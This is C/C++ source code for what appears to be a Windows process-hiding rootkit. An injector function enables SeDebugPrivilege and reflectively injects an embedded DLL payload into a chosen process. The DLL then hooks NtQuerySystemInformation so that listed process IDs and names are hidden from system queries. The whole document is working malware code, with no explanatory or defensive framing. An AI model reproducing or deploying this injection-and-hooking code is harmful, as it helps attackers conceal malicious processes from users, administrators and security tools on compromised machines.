BOOL InjectorFunc(DWORD dwProcessId, BOOL isTarget64Bit)
{
HANDLE hFile = NULL;
HANDLE hModule = NULL;
HANDLE hProcess = NULL;
HANDLE hToken = NULL;
LPVOID lpBuffer = NULL;
DWORD dwLength = 0;
DWORD dwBytesRead = 0;
TOKEN_PRIVILEGES priv = { 0 };

do
{


dwLength = isTarget64Bit ? x64PayloadSize : x86PayloadSize;
if (dwLength == INVALID_FILE_SIZE || dwLength == 0)
BREAK_WITH_ERROR("Failed to get the DLL file size");
lpBuffer = HeapAlloc(GetProcessHeap(), 0, dwLength);
if (!lpBuffer)
BREAK_WITH_ERROR("Failed to get the DLL file size");


if(0!=memcpy_s(lpBuffer, dwLength, isTarget64Bit ? x64PayloadByteArr : x86PayloadByteArr, isTarget64Bit ? x64PayloadSize : x86PayloadSize))
BREAK_WITH_ERROR("Failed to copy buffer!");
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL);

CloseHandle(hToken);
}

hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId);
if (!hProcess)
BREAK_WITH_ERROR("Failed to open the target process");

hModule = LoadRemoteLibraryR(hProcess, lpBuffer, dwLength,&argsToDLL);

if (!hModule)
BREAK_WITH_ERROR("Failed to inject the DLL");
TCHAR cpDllFile[DLL_NAME_LENGTH];
wcscpy_s(cpDllFile, DLL_NAME_LENGTH, isTarget64Bit ? x64PayloadName: x86PayloadName);
printf("[+] Injected the '%ws' DLL into process %d.\n", cpDllFile, dwProcessId);

WaitForSingleObject(hModule, -1);

} while (0);

if (lpBuffer)
HeapFree(GetProcessHeap(), 0, lpBuffer);

if (hProcess)
CloseHandle(hProcess);

return TRUE;
}

// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
#include "Payload.h"

#include "../Common/ArgumentsPassing.h"



BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
pArgStruct args = (pArgStruct)lpReserved;

switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
if (!isUp)
{
#ifdef DEBUG_MODE
PrintToFile("Injected!");
#endif // DEBUG
isUp = true;
InitializeDLL(args);
}
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
isUp = false;
UnhookDLL();
break;
}
return TRUE;
}

void InitializeDLL(pArgStruct args)
{
NtHookEngineInit();
hMutex = CreateMutex(0, TRUE, NULL);
if (args == NULL)
{
TCHAR pIDsbuff[MAX_LINE], procNameBuff[MAX_LINE];
FILE *fp;
fopen_s(&fp, INFO_TRANSFER_FILE, "r");
fgetws(pIDsbuff, MAX_LINE, fp); //first line - list of pIDs to hide
fgetws(procNameBuff, MAX_LINE, fp); //second line - list of process names to hide
pIDsbuff[wcslen(pIDsbuff) - 1] = '\0'; //delete \n
procNameBuff[wcslen(procNameBuff) - 1] = '\0';
fclose(fp);
PIDsNum = buildPIDsList(pIDsbuff, FALSE, &hiddenPIDsList);
procNameNum = buildProcNameList(procNameBuff, FALSE, &hiddenProcessNames);
}
else
{
procNameNum = buildProcNameList(args->procNames, FALSE, &hiddenProcessNames);
PIDsNum = args->pIDsNum;
int hiddenPIDsListSize = sizeof(int)*PIDsNum;
hiddenPIDsList = (int *)malloc(hiddenPIDsListSize);
memcpy_s(hiddenPIDsList, hiddenPIDsListSize, args->pIDs, sizeof(int)*args->pIDsNum);
#ifdef DEBUG_MODE
PrintToFile("Line:");
for (int i = 0; i < procNameNum; i++)
PrintToFile(hiddenProcessNames[i]);
PrintToFile("PIDs:");
for (int i = 0; i < args->pIDsNum; i++)
{
char intbuf[10];
_itoa_s(hiddenPIDsList[i], intbuf, 10, 10);
PrintToFile(intbuf);
}
#endif // DEBUG_MODE
}
OrigAddress = (PNtQueryFunc)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQuerySystemInformation");
BOOL hookres = HookFunction((ULONG_PTR)OrigAddress, (ULONG_PTR)&HookedNtQuerySystemInformation);
#ifdef DEBUG_MODE
if (!hookres)
PrintToFile("Hook Failed!");
#endif
RealNTQueryFunc = (PNtQueryFunc)GetOriginalFunction((ULONG_PTR)HookedNtQuerySystemInformation);
ReleaseMutex(hMutex);
}